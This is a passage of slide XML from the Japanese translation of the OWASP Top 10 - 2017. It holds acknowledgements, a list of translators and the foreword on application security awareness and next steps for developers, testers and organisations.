              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Manico</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Osama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Elnaggarhave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>からは多大なる支援をしていただきました。また、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Chris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Frohoffand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Gabriel Lawrence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>A8:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="" action="ppaction://noaction"/>
              </a:rPr>
              <a:t>安全でないデシリアライゼーション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>の執筆において貴重なサポートをしていただきました。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="テキスト ボックス 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA6E0A87-02CB-CC45-9EC4-37797CC9D072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510521" y="9006980"/>
            <a:ext cx="5836951" cy="540060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="4" rtlCol="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>Akitsugu</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> ITO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Albert Hsieh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Chie TAKAZAWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Hideko IGARASHI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Hiroshi TOKUMARU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Naoto KATSUMI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Riotaro OKADA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Robert DRACEA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Satoru TAKAHASHI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Sen UENO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>Shoichi</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> NAKATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>Takanori</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> ANDO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1"/>
              <a:t>Takanori</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t> NAKANOWATARI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="900" dirty="0"/>
              <a:t>Tomohiro SANAE</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4196474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3293591785"/>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9336">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>前書き</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762865">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>セキュアでないソフトウェアは財務、医療、防衛、エネルギーおよびその他の重要なインフラを損ないます。ソフトウェアがますます複雑になり、またつながるにつれて、アプリケーションセキュリティをやり遂げることは、いわば指数関数的に困難になっています。モダンなソフトウェア開発プロセスの急速な進歩により、共通するリスクを迅速かつ正確に発見し解決することは不可欠なものとなっています。我々にはもはや、この</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に示される比較的シンプルなセキュリティ問題を大目に見る余地などありません。</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OWASP Top 10 - 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の制作中に、多くのフィードバックを受け取りました。それらは、他の同様の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>プロジェクトに関する努力に勝るものでした。これは、コミュニティがこの</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にどれほどの情熱があるかを示しており、したがって</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>にとって、大多数の活用にとって</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が適切なものにすることがどれほど重要なことであるかを示しています。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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プロジェクトの当初の目標は、シンプルに開発者やマネージャーの意識を高めることでしたが、いまや</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はアプリケーションセキュリティのデファクト・スタンダードとなってきました。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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このリリースにおいて、アプリケーションセキュリティの問題や改善提案は簡潔かつ確認できる方法で記述されています。これは、さまざまなアプリケーションセキュリティ計画において、</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の採用を促進するものとなっています。大規模な組織や、セキュリティの取り組みにおいて高いレベルの組織において、厳密な標準が求められているような場合には、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>を使うようお勧めします。しかし、ほとんどの場合、</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はアプリケーションセキュリティを始めるのに良いスタートとなります。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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のさまざまなユーザーに対して、次のステップを提案しています。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>「開発者のための次のステップ」</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>「セキュリティ</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                        <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>テスト担当者のための次のステップ」</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>CIO</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>や</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>CISO</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>に適した</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>「組織のための次のステップ」</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>、アプリケーションマネージャやアプリケーションのライフサイクルの責任を持つ人に適した</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>「アプリケーションマネージャのための次のステップ」</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>です。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>長期的には、あらゆるソフトウェア開発チームと組織が、それぞれのカルチャーとテクノロジーに適合したアプリケーションセキュリティプログラムを作り上げていくようお勧めします。さまざまな形や規模のプログラムがあります。組織が今持っている強みを活かしながら、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>SAMM(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ソフトウェア品質成熟度モデル</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>を用いてアプリケーションセキュリティプログラムを計測し、改善してください。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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がアプリケーションセキュリティに関わる努力の助けになって欲しいと考えています。質問やコメント、またアイデアがあれば</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>に遠慮なくお知らせください。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Github</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>プロジェクトレポジトリはこちらです</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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プロジェクトと翻訳はこちらです</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
